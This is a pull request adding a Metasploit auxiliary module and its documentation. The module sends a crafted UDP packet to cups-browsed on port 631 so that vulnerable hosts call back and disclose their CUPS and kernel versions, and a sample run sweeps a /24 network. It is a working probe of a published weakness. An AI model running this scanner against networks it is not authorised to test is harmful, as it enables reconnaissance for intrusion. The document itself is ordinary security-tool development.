### PR TITLE
Add cups-browsed Information Disclosure module

### DIFF
--- a/documentation/modules/auxiliary/scanner/misc/cups_browsed_info_disclosure.md
+++ b/documentation/modules/auxiliary/scanner/misc/cups_browsed_info_disclosure.md
@@ -1,0 +1,31 @@
+## Vulnerable Application
+
+Retrieve CUPS version and kernel version information from `cups-browsed` services.
+
+
+## Verification Steps
+
+1. Do: `use modules/auxiliary/scanner/misc/cups_browsed_info_disclosure`
+2. Do: `set rhosts [ips]`
+3. Do: `run`
+
+## Options
+
+
+## Scenarios
+
+### Scanning a local network for CUPS services
+
+```
+msf6 > use modules/auxiliary/scanner/misc/cups_browsed_info_disclosure
+msf6 auxiliary(scanner/misc/cups_browsed_info_disclosure) > set rhosts 192.168.200.0/24
+rhosts => 192.168.200.0/24
+msf6 auxiliary(scanner/misc/cups_browsed_info_disclosure) > run
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(scanner/misc/cups_browsed_info_disclosure) > 
+[*] Using URL: http://192.168.200.130:8080/printers/s65WzxwTmx
+[+] 192.168.200.132: CUPS/2.3.1 (Linux 5.4.0-187-generic; x86_64) IPP/2.0
+[+] 192.168.200.139: CUPS/2.4.7 (Linux 6.8.0-31-generic; x86_64) IPP/2.0
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Server stopped.
+```

--- a/modules/auxiliary/scanner/misc/cups_browsed_info_disclosure.rb
+++ b/modules/auxiliary/scanner/misc/cups_browsed_info_disclosure.rb
@@ -1,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::UDPScanner
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize
+    super(
+      'Name' => 'cups-browsed Information Disclosure',
+      'Description' => %q{
+        Retrieve CUPS version and kernel version information from cups-browsed services.
+      },
+      'Author' => [
+        'evilsocket', # discovery
+        'bcoles' # msf
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['URL', 'https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8' ],
+        ['URL', 'https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/' ],
+      ],
+      'DefaultOptions' => { 'RPORT' => 631 },
+    )
+    deregister_options('URIPATH')
+  end
+
+  def build_probe
+    @probe ||= "0 3 #{get_uri}"
+    @probe
+  end
+
+  def run
+    start_service('Path' => "/printers/#{Rex::Text.rand_text_alphanumeric(10..16)}")
+    super
+  end
+
+  def on_request_uri(cli, request)
+    return if request.nil?
+
+    info = request['User-Agent']
+
+    return unless info.to_s.include?('CUPS')
+
+    print_good("#{cli.peerhost}: #{info}")
+
+    report_host(host: cli.peerhost)
+    report_service(
+      host: cli.peerhost,
+      proto: 'udp',
+      port: rport,
+      name: 'cups-browsed',
+      info: info
+    )
+    report_vuln({
+      host: cli.peerhost,
+      port: rport,
+      proto: 'udp',
+      name: 'cups-browsed Information Disclosure',
+      refs: references
+    })
+  end
+end


### PR DESCRIPTION
Short and sweet. Simple scanner.

1. Do: `use modules/auxiliary/scanner/misc/cups_browsed_info_disclosure`
2. Do: `set rhosts [ips]`
3. Do: `run`
